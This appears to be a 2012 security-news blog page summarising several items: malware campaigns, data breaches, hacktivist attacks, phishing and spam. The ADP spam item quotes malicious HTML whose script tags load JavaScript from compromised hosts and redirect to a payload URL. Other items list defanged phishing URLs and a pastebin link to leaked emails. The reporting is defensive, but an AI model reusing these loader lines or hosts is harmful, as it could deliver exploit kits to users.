Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Malware Report
Breaking News Malware Report

Mac and Windows Malware Campaign Targets Uyghur Activists


Researchers at Kaspersky Lab intercepted a Mac-based Trojan attack was targeting Uyghur human rights activists.

According Costin Raiu, Director of Kaspersky's Global Research and Analysis Team, the campaign uses malicious e-mails containing a JPEG photo and a Mac OS X app embedded in a ZIP file.

When recipient open the zip file, it will the malware installs itself on the Mac OS system system and then attempts to connect to a Command and Control (C&C) server and allow the attacker to run commands on the infected computer and access its files.

“The application is actually a new, mostly undetected version of the MaControl backdoor (Universal Binary), which supports both i386 and PowerPC Macs. We detect it as 'Backdoor.OSX.MaControl.b'," Raiu noted a in a blog post.

"The backdoor is quite flexible – its Command and Control servers are stored in a configuration block which has been appended at the end of the file, 0x214 bytes in size. The configuration block is obfuscated with a simple “substract 8” operation. " he added.

Researchers appear to have traced the C&C server to an IP address in China.

Similar to Kaspersky Lab's discovery, AlienVault Labs claims to have found another backdoor that targets windows users.

Transmitted through email, the attack also includes a zip file - along with a Winrar file. The file extracts a binary that goes on to copy itself but not before dropping a DLL file on the system. After its injected, the DLL file appears to help initiate Gh0st RAT, a well-known remote access tool. Gh0st RAT was served up by Amnesty international’s website just last month and has been used in other targeted attack campaigns in recent years.

Read more »
Breaking News
Breaking News

Stolen Laptop Puts 30,000 Texas Cancer Center Patients at Risk of identity theft

A laptop stolen from an employee at a Houston, Texas, cancer hospital has put as many as 30,000 patients at risk of identity theft.


The University of Texas MD Anderson Cancer Center issued a security advisory explaining that on April 30, an unencrypted laptop was stolen an MD Anderson faculty member’s home.

The faculty member notified the local police department. MD Anderson was alerted to the theft on May 1, and immediately began a thorough investigation to determine what information was contained on the laptop.

"We have confirmed that the laptop may have contained some of our patients' personal information, including patients' names, medical record numbers, treatment and/or research information, and in some instances Social Security numbers," MD Anderson said.

MD Anderson is the second major cancer center in the U.S. to fall victim to a recent security breach; last week, Memorial Sloan-Kettering Cancer Center in New York began notifying patients that their medical records and Social Security numbers may have been compromised. In the past year, several hospitals and colleges, including Yale and Columbia University, have been hit by data breaches that put large populations of people at risk.

According to the Houston Business Journal, Social Security numbers for about one-third of the hospital's patients (about 10,000) were stored on the stolen MD Anderson laptop. The cancer treatment hospital said it has "no reason to believe" that the computer, which is still missing, "was stolen for the information that it contained." MD Anderson said police have launched a criminal investigation and are working to locate the laptop.

Read more »
Database Leaked
Breaking News Database Leaked

Trendmicro & Sykes Hacked by @OfficialComrade

One of the popular antivirus TrendMicro website has been hacked by @OfficialComrade (.c0mrade) and dumped a huge load of emails.

The attack which also effects Sykes, who which trendmicro appears to run support services through, has been effected as well. The attack was announced on .c0mrades twitter with the following message.

"Trendmicro & Sykes is a Global Business and Antivirus suite, we've targeted them due to their constant lash of pseudo-security." Hacker said in the pastebin.

 "Owning Trendmicro & Sykes wasn't a priority of ours. However, if it was, they would have dug their burial site sometime ago."

" Sliding towards more recent events, today is June 30th, 2012 and absurdly, I'm monotonous. Why? Because Nowadays, it seems as if everybody is widely concerned with notoriety. New 'groups' are emerging, more 'pigments' are being infiltrated by demented teenagers so they could feel better about themselves, etc. My demands are written on the palm of my hands; stop. You're a nuisance. Sliding back to the whole Trendmicro & Sykes testament, we don't want to be compete pricks, so for the companies' sake, we'll take baby steps on this one. We'll release every inch of their Email Database; Inbox, Drafts, Sent Items, Deleted Items, Attachments, and all content in all folders. You'll need a .dbx file viewer to see the content."

http://pastebin.com/EVSAXjz1
Read more »
Spam Report
BlackHole Exploit Spam Report

Emails with Subject "ADP Funding Notification – Debit Draft" leads to Exploits


Researchers at MX Lab , has intercepted some emails with the subject “ADP Funding Notification – Debit Draft” that lead to a malicious web site with obfuscated Javascript code.


The email is send from the spoofed address “ADP_FSA_Services@ADP.com” or “ADPClientServices@adp.com” and has the following body:


Your Transaction Report(s) have been uploaded to the web site:

https://www.flexdirect.adp.com/client/login.aspx

Please note that your bank account will be debited within one banking

business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any

questions or comments, please Contact your ADP Benefits Specialist.

Thank You,

ADP Benefit Services
The URL will not lead you to the site that is mentioned but to hxxp://www.avrakougioumtzi.gr/PQB6j3HW/index.html where the following HTML code is executed:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”hxxp://firmowa.malopolska.pl/WVfNMNHn/js.js”></script>
<script type=”text/javascript” src=”hxxp://humas.poltek-malang.ac.id/w28K6pb6/js.js”></script>

</html>

Both embedded Javascript URLs will redirect you document.location=’hxxp://173.255.228.171/getfile.php?u=853fda24′; The above page contains an obfuscated javascript.

  After de-obfuscating the javascript, i found there is Blackhole exploit pack that try to exploit one of the vulnerable software(flash, pdf and other exploits). At the bottom of the page, you can find the applet code that try to exploit the Java Atomic reference vulerability.

Read more »
Malware Report
Malware Report

Zemra ,a new Distributed Denial of Service (DDoS) crimeware bot


A Distributed Denial of Service (DDoS) crimeware bot known as "Zemra" has been identified by Symantec Researchers. This threat has been observed performing denial-of-service attacks against organizations with the purpose of extortion.

Zemra first appeared on underground forums in May 2012 at a cost of €100($125).

This crimeware pack is similar to other crime packs, such as Zeus and SpyEye, in that is has a command-and-control panel hosted on a remote server. This allows it to issue commands to compromised computers and act as the gateway to record the number of infections and bots at the attacker's disposal.

Zemra uses 256-bit DES encryption/decryption for communication between server and client;and it can spread via USB devices.

Researchers revealed that the main functionality is the ability to perform a DDoS attack on a remote target computer of the user's choosing.

Read more »
Malware Report
Malware Report

New version of Citadel Trojan prevents Virtual Machine Analysis


Security Researchers from S21sec, has spotted two major changes in the latest version of Citadel Trojan. The two major changes 'Anti-emulator' and 'Encryption change' try to make malware analysts' life harder.

The anti-emulator: When it starts, a built-in detective checks if it is running in a virtual machine or in sandboxed environment (CWSandbox, VMware, Virtualbox).

If it detects their presence, it starts to behave differently. Details were not disclosed, and the technology is very tricky.

According to researchers, It simply scans through the resources of the currently running processes and looks for specific patterns for instance inside the "CompanyName" field, such as 'vmware','sandbox','virtualbox','geswall'.

While running in the VM, The Trojan creates a fake domain name and attempts to connect to it. This strategy should fool the researchers into believing that the (C&C) command and control server cannot be reached and that the bot is dead.

This is not the only change brought to Citadel. Experts have found that the RC4 is slightly different compared to previous versions, an internal hash being added to the algorithm.
Read more »
Cyber Crime
Cyber Crime

"Evil" Hacker sentenced to Two-and-a-half Years

The Australian hacker nicknamed “Evil” was sentenced to two-and-a-half years in prison, but could be released on parole in 12 months because he pleaded guilty, according to Police.

25-year-old David Noel Cecil,had been arrested almost a year ago for hacking a National Broadband Network-linked service provider, changing and accessing restricted data. He was also accused of cyber-attacking Sydney University’s website, several Melbourne businesses, and companies overseas. Overall, Cecil was charged with 50 counts, but refused to be bailed.

Police ran a six-month investigation dubbed “Operation Damara”, and said the 25-year-old unemployed truck driver wanted to prove himself after failing to get into the IT sector.

“This person acted with an extreme and unusual level of malice and with no regard to the damage caused, indiscriminately targeting both individuals and companies,” National Manager Hi Tech Crime Operations Neil Gaughan said.

Feds said further charges will likely follow and others will also be arrested.
Read more »
Spam Report
Spam Report

‘Confirm PayPal account' notifications lead to phishing sites


An extremely legitimately-looking PayPal themed emails has been hitting inboxes in the last few days, trying totrick users into entering their accounting data on the fraudulent web site linked in the emails.

"Dear PayPal Costumer, It has come to our attention that your PayPal account information needs to be updated as part of our continuing commitment to protect your account and to reduce the instance of fraud on our website," The fake email reads.

"If you could please take 5-10 minutes out of your online experience and update your personal records you will not run into any future problems with the online service. However, failure to update your records will result in account suspension. Please update your records before June 12, 2012. Once you have updated your account records, your PayPal account activity will not be interrupted and will continue as normal."

The offered link takes those users to a faithfully reproduced PayPal phishing site:

And while the URL of the site (hxxp://lejesepofol.altervista.org/plaoyap/plaoyap/index.htm) might warn some users about its true nature, there are still too many who won't be bothered with checking it before entering their PayPal login credentials.
Read more »
LulzSec
Breaking News LulzSec

Panda Security site Hacked and database compromised by @LulzSecMx


A Hacker called as @LulzSecMx, claimed to have unauthorized access to one of the biggest Anti-virus providers, 'Panda Security' website and leaked the database in pastebin. The attack announced via @LulzSecMx .

"pandasecurity.com, best known for its antivirus shit we have a message for you: D" Hacker said.

 "We entered through the back door, they have earned money by working with police to be on the lookout and inform activists, your page as your antivirus is bullshit!"

The leak contains email address, encrypted passwords and some other confidential data compromised from the PandaSecurity.com website.
Read more »
Breaking News
Anonymous Hackers Breaking News

Anonymous Hackers attacked Japanese Govt. sites in Protest of Anti-Piracy Laws


The international hackers collective Anonymous has launched a series of cyber-attacks against Japanese government websites in protest at new stiffer penalties for illegal downloading that were passed in a copyright law amendment last week.

According to The Japan Times, the law was approved by the Education, Culture and Science Committee of the House of Councilors with 221 votes in favor.

After October 1, when the law goes into effect, users who download copyrighted content or copy DVDs may receive a fine of up to ¥2 million ($250,000 or 200,000 EUR) and can even be sentenced to a maximum of two years in prison.

Many fear that the way the bill is worded leaves a lot of room for interpretation, which could lead to a lot of unfair prosecutions.

In response to the news, Anonymous has released a statement that announces the start of an operation against the Japanese government.

“Earlier this week Japan approved an amendment to its copyright law which will give authorities the right to imprison citizens for up to two years simply for downloading copyrighted material,” Anonymous wrote.

“We at Anonymous believe strongly that this will result in scores of unnecessary prison sentences to numerous innocent citizens while doing little to solve the underlying problem of legitimate copyright infringement,” the hacktivists added.

“If this situation alone wasn’t horrible enough already, the content industry is now pushing ISPs in Japan to implement surveillance technology that will spy on and every single internet user in Japan. This would be an unprecedented approach and severely reduce the amount of privacy law abiding citizens should have in a free society.”

They concluded by launching a threat against the government and organizations that represent rights holders.

“To the government of Japan and the Recording Industry Association of Japan, you can now expect us the same way we have come to expect you in violating our basic rights to privacy and to an open internet.”

After the operation was announced, The finance ministry’s website was hacked with messages opposing the stricter copyright laws posted on a number of its pages. The sites of the Supreme Court of Japan and the Intellectual Property High Court were also reported down overnight, while access to the sites of the two main political parties was said to be restricted.
Read more »
Software Release
Malware Analyzers Software Release

Hook Analyser 2.0 released -reversing application and analysing malwares

Hook analyser is a hook tool which could be potentially helpful in reversing application and analysing malwares.

Changelog:

  • Static analysis functionality has got improved significantly.
  • Nice fingerprinting feature (part of the static analysis module).
  • Analysis and logging modules have improved.
  • No more annoying browser pop-ups (previous releases had some).
Download it from here:
http://beenuarora.com/HookAnalyser2.0.zip
Read more »
Subscribe to: Comments (Atom)